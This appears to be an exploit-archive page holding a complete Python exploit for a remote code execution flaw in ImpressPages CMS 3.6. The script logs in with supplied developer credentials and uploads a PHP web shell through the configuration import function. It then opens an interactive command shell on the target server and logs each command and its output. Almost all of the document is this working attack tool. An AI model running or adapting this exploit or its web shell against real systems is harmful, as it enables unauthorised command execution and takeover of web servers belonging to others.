exploit the possibilities

ImpressPages CMS 3.6 Remote Code Execution

ImpressPages CMS 3.6 Remote Code Execution
Posted Nov 3, 2013
Authored by LiquidWorm | Site zeroscience.mk

ImpressPages CMS version 3.6 manage() function remote code execution exploit.

tags | exploit, remote, code execution
MD5 | 1196dd1c067c27c093fa2fc71155344e

ImpressPages CMS 3.6 Remote Code Execution

Change Mirror Download
#!/usr/bin/python
#
#
# ImpressPages CMS v3.6 manage() Function Remote Code Execution Exploit
#
#
# Vendor: ImpressPages UAB
# Product web page: http://www.impresspages.org
# Affected version: 3.6, 3.5 and 3.1
#
# Summary: ImpressPages CMS is an open source web content management system with
# revolutionary drag & drop interface.
#
# Desc: The vulnerability is caused due to the improper verification of uploaded
# files in '/ip_cms/modules/developer/config_exp_imp/manager.php' script thru the
# 'manage()' function (@line 65) when importing a configuration file. This can be
# exploited to execute arbitrary PHP code by uploading a malicious PHP script file
# that will be stored in '/file/tmp' directory after successful injection.
# Permission Developer[Modules exp/imp] is required (parameter 'i_n_2[361]' = on)
# for successful exploitation.
#
# Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
# GNU/Linux CentOS 6.3 (Final)
# Apache 2.4.2 (Win32) / Apache2
# PHP 5.4.7 / PHP 5.3.21
# MySQL 5.5.25a
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# Zero Science Lab - http://www.zeroscience.mk
# Macedonian Information Security Research And Development Laboratory
#
#
# Advisory ID: ZSL-2013-5159
# Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2013-5159.php
#
# Vendor: http://www.impresspages.org/blog/impresspages-cms-3-7-is-mobile-as-never-before/
#
#
# 12.10.2013
#

ver = '1.0.0.000251'

import itertools, mimetools, mimetypes
import cookielib, urllib, urllib2, sys
import logging, os, time, datetime, re

from colorama import Fore, Back, Style, init
from cStringIO import StringIO
from urllib2 import URLError

init()

if os.name == 'posix': os.system('clear')
if os.name == 'nt': os.system('cls')
piton = os.path.basename(sys.argv[0])

def bannerche():
print """
@---------------------------------------------------------------@
| |
| ImpressPages CMS 3.6 RCE 0day |
| |
| |
| ID: ZSL-2013-5159 |
| |
| Copyleft (c) 2013, Zero Science Lab |
| |
@---------------------------------------------------------------@
"""
if len(sys.argv) < 3:
print '\n\x20\x20[*] '+Fore.YELLOW+'Usage: '+Fore.RESET+piton+' <hostname> <path>\n'
print '\x20\x20[*] '+Fore.CYAN+'Example: '+Fore.RESET+piton+' zeroscience.mk impresspages\n'
sys.exit()

bannerche()

print '\n\x20\x20[*] Initialising exploit '+'.'*34+Fore.GREEN+'[OK]'+Fore.RESET

host = sys.argv[1]
path = sys.argv[2]

cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))

try:
opener.open('http://'+host+'/'+path+'/admin.php')
except urllib2.HTTPError, errorzio:
if errorzio.code == 404:
print '\x20\x20[*] Checking path '+'.'*41+Fore.RED+'[ER]'+Fore.RESET
print '\x20\x20[*] '+Fore.YELLOW+'Check your path entry.'+Fore.RESET
sys.exit()
except URLError, errorziocvaj:
if errorziocvaj.reason:
print '\x20\x20[*] Checking host '+'.'*41+Fore.RED+'[ER]'+Fore.RESET
print '\x20\x20[*] '+Fore.YELLOW+'Check your hostname entry.'+Fore.RESET
sys.exit()

print '\x20\x20[*] Checking host and path '+'.'*32+Fore.GREEN+'[OK]'+Fore.RESET
token_chk = opener.open('http://'+host+'/'+path+'/admin.php')
response = token_chk.read()
match = re.search('(?<=security_token=)\w+', response)
sectoken = match.group(0)

print '\x20\x20[*] Login please.'
username = raw_input('\x20\x20[*] Enter username: ')
password = raw_input('\x20\x20[*] Enter password: ')

login_data = urllib.urlencode({
'f_name' : username,
'f_pass' : password,
'action' : 'login'
})

login = opener.open('http://'+host+'/'+path+'/admin.php?action=login&security_token='+sectoken, login_data)
auth = login.read()
for session in cj:
sessid = session.name

ses_chk = re.search(r'%s=\w+' % sessid , str(cj))
cookie = ses_chk.group(0)

print '\x20\x20[*] Mapping Session ID '+'.'*36+Fore.GREEN+'[OK]'+Fore.RESET
print '\x20\x20[*] Cookie: '+Fore.YELLOW+cookie+Fore.RESET+'\x20'+'.'*(46 - len(cookie))+Fore.GREEN+'[OK]'+Fore.RESET
print '\x20\x20[*] Mapping security token '+'.'*32+Fore.GREEN+'[OK]'+Fore.RESET
print '\x20\x20[*] Token: '+Fore.YELLOW+sectoken+Fore.RESET+'\x20'+'.'*15+Fore.GREEN+'[OK]'+Fore.RESET

if re.search(r'Incorrect name or password', auth):
print '\x20\x20[*] Faulty credentials given '+'.'*30+Fore.RED+'[ER]'+Fore.RESET
sys.exit()
elif re.search(r'Your login suspended for one hour', auth):
print '\x20\x20[*] Your username is suspended for 1 hour '+'.'*17+Fore.RED+'[ER]'+Fore.RESET
sys.exit()
else:
print '\x20\x20[*] Authenticated '+'.'*41+Fore.GREEN+'[OK]'+Fore.RESET
print '\x20\x20[*] Sending payload '+'.'*39+Fore.GREEN+'[OK]'+Fore.RESET

class MultiPartForm(object):

def __init__(self):
self.form_fields = []
self.files = []
self.boundary = mimetools.choose_boundary()
return

def get_content_type(self):
return 'multipart/form-data; boundary=%s' % self.boundary

def add_field(self, name, value):
self.form_fields.append((name, value))
return

def add_file(self, fieldname, filename, fileHandle, mimetype=None):
body = fileHandle.read()
if mimetype is None:
mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
self.files.append((fieldname, filename, mimetype, body))
return

def __str__(self):

parts = []
part_boundary = '--' + self.boundary

parts.extend(
[ part_boundary,
'Content-Disposition: form-data; name="%s"' % name,
'',
value,
]
for name, value in self.form_fields
)

parts.extend(
[ part_boundary,
'Content-Disposition: file; name="%s"; filename="%s"' % \
(field_name, filename),
'Content-Type: %s' % content_type,
'',
body,
]
for field_name, filename, content_type, body in self.files
)

flattened = list(itertools.chain(*parts))
flattened.append('--' + self.boundary + '--')
flattened.append('')
return '\r\n'.join(flattened)

if __name__ == '__main__':

form = MultiPartForm()
form.add_field('spec_security_code', '12345678901234567890123456789012')
form.add_field('spec_rand_name', 'lib_php_form_standard_1_')

form.add_file('config', 'liwo.php',
fileHandle=StringIO('<?php echo \"<pre>\"; passthru($_GET[\'cmd\']); echo \"</pre>\"; ?>'))

request = urllib2.Request('http://'+host+'/'+path+'/admin.php?module_id=361&action=import&security_token='+sectoken)
request.add_header('User-agent', 'joxypoxy 1.0')
body = str(form)
request.add_header('Content-type', form.get_content_type())
request.add_header('Cookie', cookie)
request.add_header('Content-length', len(body))
request.add_data(body)
request.get_data()
urllib2.urlopen(request).read()

print '\x20\x20[*] Starting logging service '+'.'*30+Fore.GREEN+'[OK]'+Fore.RESET
print '\x20\x20[*] Spawning shell '+'.'*40+Fore.GREEN+'[OK]'+Fore.RESET
time.sleep(1)
furl = '/admin.php?module_id=361&action=import_uploaded&security_token='

def osys():
cmd = 'uname'
execute = opener.open('http://'+host+'/'+path+furl+sectoken+'&cmd='+urllib.quote(cmd))
reverse = execute.read()
if re.search(r'Linux', reverse, re.IGNORECASE):
cmd = 'pwd'
print Style.DIM+Fore.WHITE
print '\n\x20\x20[*] Coins: 1'
print '\x20\x20[*] Detected platform: Linux'
print '\x20\x20[*] Type \'exit\' to leave'
print '\x20\x20[*] Choose your CMDs wisely'
print '\x20\x20[*] Your current location:'
print Style.RESET_ALL+Fore.RESET
return cmd
else:
cmd = 'cd'
print Style.DIM+Fore.WHITE
print '\n\x20\x20[*] Coins: 1'
print '\x20\x20[*] Detected platform: Windows'
print '\x20\x20[*] Type \'exit\' to leave'
print '\x20\x20[*] Choose your CMDs wisely'
print '\x20\x20[*] Your current location:'
print Style.RESET_ALL+Fore.RESET
return cmd

print

today = datetime.date.today()
fname = 'impress-'+today.strftime('%d-%b-%Y')+time.strftime('_%H%M%S')+'.log'
logging.basicConfig(filename=fname,level=logging.DEBUG)

logging.info(' '+'+'*75)
logging.info(' +')
logging.info(' + Log generated on: '+today.strftime('%A, %d-%b-%Y')+time.strftime(', %H:%M:%S'))
logging.info(' + Title: ImpressPages CMS 3.6 manage() Function Remote Code Execution')
logging.info(' + Python program executed: '+sys.argv[0])
logging.info(' + Version: '+ver)
logging.info(' + Full query: \''+piton+'\x20'+host+'\x20'+path+'\'')
logging.info(' + Username input: '+username)
logging.info(' + Password input: '+password)
logging.info(' + Vector: '+'http://'+host+'/'+path+furl+sectoken)
logging.info(' +')
logging.info(' + Advisory ID: ZSL-2013-5159')
logging.info(' + Zero Science Lab - http://www.zeroscience.mk')
logging.info(' +')
logging.info(' '+'+'*75+'\n')

print Style.DIM+Fore.CYAN+'\x20\x20[*] Press [ ENTER ] to INSERT COIN!\n'+Style.RESET_ALL+Fore.RESET
while True:
try:
cmd = raw_input(Fore.RED+'shell@'+host+':~# '+Fore.RESET)
if cmd.strip() == '':
cmd = osys()

execute = opener.open('http://'+host+'/'+path+furl+sectoken+'&cmd='+urllib.quote(cmd))
reverse = execute.read()
pattern = re.compile(r'<pre>(.*?)</pre>',re.S|re.M)

print Style.BRIGHT+Fore.CYAN
cmdout = pattern.match(reverse)
print cmdout.groups()[0].strip()
print Style.RESET_ALL+Fore.RESET

if cmd.strip() == 'exit':
break

logging.info('Command executed: '+cmd+'\n\nOutput: \n'+'='*8+'\n\n'+cmdout.groups()[0].strip()+'\n\n'+'-'*60+'\n')
except Exception:
break

logging.warning('\n\n END OF LOG')
print '\x20\x20[*] Carpe commentarius '+'.'*36+Fore.GREEN+'[OK]'+Fore.RESET
print '\x20\x20[*] File '+Fore.YELLOW+fname+Fore.RESET+'\x20'+'.'*19+Fore.GREEN+'[OK]'+Fore.RESET
sys.exit()
Login or Register to add favorites

File Archive:

January 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    2 Files
  • 2
    Jan 2nd
    0 Files
  • 3
    Jan 3rd
    20 Files
  • 4
    Jan 4th
    4 Files
  • 5
    Jan 5th
    37 Files
  • 6
    Jan 6th
    20 Files
  • 7
    Jan 7th
    4 Files
  • 8
    Jan 8th
    0 Files
  • 9
    Jan 9th
    0 Files
  • 10
    Jan 10th
    18 Files
  • 11
    Jan 11th
    8 Files
  • 12
    Jan 12th
    19 Files
  • 13
    Jan 13th
    31 Files
  • 14
    Jan 14th
    2 Files
  • 15
    Jan 15th
    2 Files
  • 16
    Jan 16th
    2 Files
  • 17
    Jan 17th
    18 Files
  • 18
    Jan 18th
    13 Files
  • 19
    Jan 19th
    15 Files
  • 20
    Jan 20th
    29 Files
  • 21
    Jan 21st
    12 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    17 Files
  • 25
    Jan 25th
    34 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close